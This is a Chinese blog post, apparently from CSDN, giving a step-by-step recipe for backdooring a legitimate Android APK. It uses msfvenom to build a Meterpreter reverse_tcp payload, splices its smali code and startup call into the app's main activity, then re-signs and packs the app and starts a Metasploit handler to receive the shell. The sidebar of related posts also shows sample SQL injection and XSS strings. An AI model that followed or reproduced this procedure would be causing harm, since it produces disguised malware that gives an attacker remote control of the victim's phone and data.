payload注入android APK教程

最新推荐文章于 2024-04-10 09:36:34 发布
最新推荐文章于 2024-04-10 09:36:34 发布
阅读量1.3k 收藏 6
点赞数 1
分类专栏: 网安 文章标签: linux shell android python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44212888/article/details/114109947
版权

参考了网络很多大神文章,简单小结一下,仅供参考
1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP  LPORT=监听端口号 -o virus.apk
2,apktook反编译virus.apk和normal.apk
3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,
4,找到com/xxx/xxx/MainActivety.smail文件并搜索onCreat函数,找到bundle对象在下面添加启动payload:  invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5,把virus.apk的smail文件(payload的smail/com/metasploit文件),复制到normal.apk的smail/com/目录下
6,androidManifest.xml 添加权限permission
7,回编译       //https://blog.csdn.net/weixin_44212888/article/details/111396635
8,签名        //https://blog.csdn.net/weixin_44212888/article/details/111396635
9,加壳       //百度"加壳工具"
10,service postgresql start  //启动数据库
11,msfconsole    //启动msf
12,use exploit/multi/handler     //加载攻击模块
13,set payload android/meterpreter/reverse_tcp  //选择要使用的Payload
14,show options //查看需要设置的

最低0.47元/天 解锁文章
QQ:1519938366
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
extract_android_payload
03-16
extract_android_payload 从OTA payload.bin文件中提取Android固件映像。 不支持增量固件映像 extract_android_payload.py-用于从payload.bin中提取分区图像的命令行工具 usage: extract_android_payload.py [-h] {extract,list} ... 位置参数: {extract,list} List of commands 可选参数: -h, --help show this help message and exit 例子 # python extract_android_payload.py extract -p system_ext payload.bin /tmp/ Extracting system_ext.img # python extrac
SQL注入Playload List
qq_52014772的博客
07-22 1109
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。 SQL注入类型 类型 描述 In-band SQLi (Classic SQLi) In-band SQLi注入是SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类型是基于错误的SQLi和基于联合的SQLi。 Error-based SQLi 基于错误的SQLi是一种In-band..
XXE注入payload列表:技术解析与应用指南
最新发布
gitblog_00093的博客
04-10 436
XXE注入payload列表:技术解析与应用指南 项目地址:https://gitcode.com/payloadbox/xxe-injection-payload-list ![](https://gitcode.net payloadbox/xxe-injection-payload-list/mascot.svg?width=64&height=64) 在Web安全领域,XML Ex...
手动地在安卓apk嵌入Payload
QQ_1519938366的博客
02-12 492
信息安全、木马、Payload 嵌入、安卓 apk 安全
XSS payload 注入
chenxunyang0492的博客
01-02 406
存储型写法 <script>alert(/StoredXssByScriptTag/);</script> "'><script>alert(/StoredXssByScriptTagBypass);</script> [Bypass o...
手工SQL注入payload
山兔的博客
03-17 293
and sleep(5)(判断页面返回时间)-1/+1 回显上下页(整形)单引号(字符型/整形)
Android Pentest - Inject Payload to Any APK file [HD] ✔.mp4
03-11
Android Pentest - Inject Payload to Any APK file
Backdooring an Android APK with a Meterpreter Payload & AV Bypass.mp4
03-11
Backdooring an Android APK with a Meterpreter Payload & AV Bypass,Technology sharing is meaningful
payload.apk.1
12-09
payload.apk.1
payload_dumper.zip
01-25
Android AB update升级包解包工具,针对payload.bin解包
官方Payload.bin格式固件VAB镜像提取工具 完美好用+带教程
06-11
官方Payload.bin格式固件VAB镜像提取工具 完美好用+带教程 官方卡刷包固件里分区目前都是Payload.bin格式的,以前都是使用其他解密工具先把官方包解压出里面的Payload.bin文件在次解开其中的分区 此资源直接可以解...
渗透学习日记day14(sql注入payload
qq_44836237的博客
12-09 514
Union 查询利用条件:页面要有回显点 无回显点: 单双引号看是否报错,若报错,判断是否为整数型 猜测查询语句:如果是整数型用sleep()函数会延迟 若为整数型:select * from xxx where id = 1 and sleep(3) 会延迟 若是字符串型:select * from xxx where id = '1 and sleep(3)' 不会延迟 这里得知sqli-labs第二关是整数型无回显但是可以报错 通过以下paylo...
Android OTA 相关工具(四) 查看 payload 文件信息
洛奇看世界
02-26 4561
一直以来,很多人都表达过很想去研究一下 Android OTA 的 payload 文件,看看里面到底有什么,想对其进行一番研究操作,但又觉得 payload 文件很复杂,最终望而却步。从 Android 10(Q) 的动态分区开始,update_engine 的代码中新增了一个名为 payload_info.py 的脚本,专门用于解析 payload.bin 文件并显示相关信息。有了这个工具,我觉得你应该不需要再对 payload.bin 文件内容发愁了。
SQL注入:sqlmap布尔型盲注payload解析
无名J0kзr的博客
10-07 3821
难受 占坑明天更
sql注入payload总结
recover517的博客
03-04 8515
个人经验加网上的wp总结的注入类型,附上sqlmap命令
Android Update Engine分析(十四) 生成 payload 数据
洛奇看世界
01-30 3185
生成 payload 数据是 `delta_generator` 工具最主要的功能,当我准备重新更新这一些列文章时,一开始就想写这个的,不过因为太久没看,不记得 payload 细节了,更无从从细节上分析。所以就先写一些简单的操作,等熟悉了再开始写。经过前面篇的分析了解 payload 结构,现在是时候来解决这个问题了。
android局部刷新fb,RecyclerView - 的 payload,实现局部刷新
weixin_30224231的博客
05-29 572
在RecyclerView的源码里,有如下方法:public void onBindViewHolder(VHholder, int position, List payloads) {onBindViewHolder(holder, position);}该函数不是abstract的,所以容易被忽视,但是,其中payloads参数,可以实现RecyclerView的局部刷新.如果你的Recycl...
sql注入payload
09-01
SQL注入payload是一种用于测试和利用SQL注入漏洞的代码片段。以下是一些常见的SQL注入payload的示例: 1. 基于单引号字符型注入payload: ' OR 1=1 -- 这个payload的目的是通过在注入点处插入注释符和逻辑运算符...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值